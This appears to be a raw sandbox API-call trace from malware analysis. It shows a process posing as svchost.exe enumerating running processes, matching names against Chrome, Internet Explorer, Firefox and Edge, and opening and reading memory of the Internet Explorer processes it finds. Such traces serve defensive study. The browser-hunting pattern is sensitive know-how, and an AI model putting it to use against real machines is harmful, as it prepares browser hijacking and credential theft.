	[0197.509] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.509] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0197.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.509] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.509] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0197.510] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x142c
	[0197.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.510] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0197.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.511] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.511] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0197.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.511] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.511] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0197.512] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x1430
	[0197.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.512] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0197.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.513] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.513] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0197.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.514] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.514] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0197.515] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x1434
	[0197.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.515] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0197.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.516] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.516] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.516] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0197.516] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.516] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.516] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0197.517] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x1438
	[0197.517] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.517] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0197.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.518] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.518] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0197.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.518] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.519] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0197.519] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x143c
	[0197.519] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.519] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0197.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.520] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.520] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0197.521] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.521] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.521] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0197.522] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x1440
	[0197.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.522] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0197.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.522] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.522] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0197.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.523] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.523] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0197.523] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x1444
	[0197.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.524] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0197.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.524] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.524] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0197.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.524] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.524] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0197.525] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x1448
	[0197.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.525] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0197.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.526] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.526] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0197.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.527] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.527] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0197.528] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x144c
	[0197.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.540] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0197.541] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.541] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.542] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0197.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.543] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.578] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0197.578] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x1450
	[0197.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.578] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0197.579] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.579] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.579] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.579] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0197.580] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.580] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.580] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0197.581] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x1454
	[0197.581] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.581] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0197.582] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.582] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.582] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.582] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0197.583] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.583] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.583] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0197.584] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x1458
	[0197.584] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.584] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0197.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.585] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.585] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0197.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.585] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.586] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0197.586] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x145c
	[0197.586] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.587] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0197.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.587] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0197.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.587] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0197.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.587] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.588] NtQueryInformationProcess (in: ProcessHandle=0x145c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0197.588] ReadProcessMemory (in: hProcess=0x145c, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0197.588] ReadProcessMemory (in: hProcess=0x145c, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0197.588] ReadProcessMemory (in: hProcess=0x145c, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0197.588] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0197.588] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0197.589] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x1460
	[0197.589] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.589] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0197.589] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.589] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0197.589] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.589] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0197.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.590] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.590] NtQueryInformationProcess (in: ProcessHandle=0x1460, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0197.590] ReadProcessMemory (in: hProcess=0x1460, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0197.590] ReadProcessMemory (in: hProcess=0x1460, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0197.590] ReadProcessMemory (in: hProcess=0x1460, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0197.590] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0197.590] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0197.591] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x1464
	[0197.591] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.591] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0197.591] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.591] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.592] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0197.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.592] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.592] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0197.593] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x1468
	[0197.593] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.593] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0197.593] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.593] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.594] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0197.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.594] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.594] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0197.595] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x146c
	[0197.595] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.595] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0197.595] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.595] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.596] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.596] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0197.596] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.596] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.596] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0197.597] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0197.597] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb98) returned 0x1470
	[0197.598] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.598] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0197.598] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.598] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.598] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.598] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0197.598] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.598] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.599] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0197.599] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x1474
	[0197.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.599] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0197.600] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.600] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.600] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.600] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0197.600] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.600] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.601] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0197.601] CloseHandle (hObject=0x188) returned 1
	[0197.601] Sleep (dwMilliseconds=0x64) 
	[0197.707] GetCurrentProcessId () returned 0x110
	[0197.707] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0197.709] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0197.710] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0197.711] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0197.711] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x1478
	[0197.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.712] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0197.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.712] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.712] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0197.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.712] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.713] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0197.713] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x147c
	[0197.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.714] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0197.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.714] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.714] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0197.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.714] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
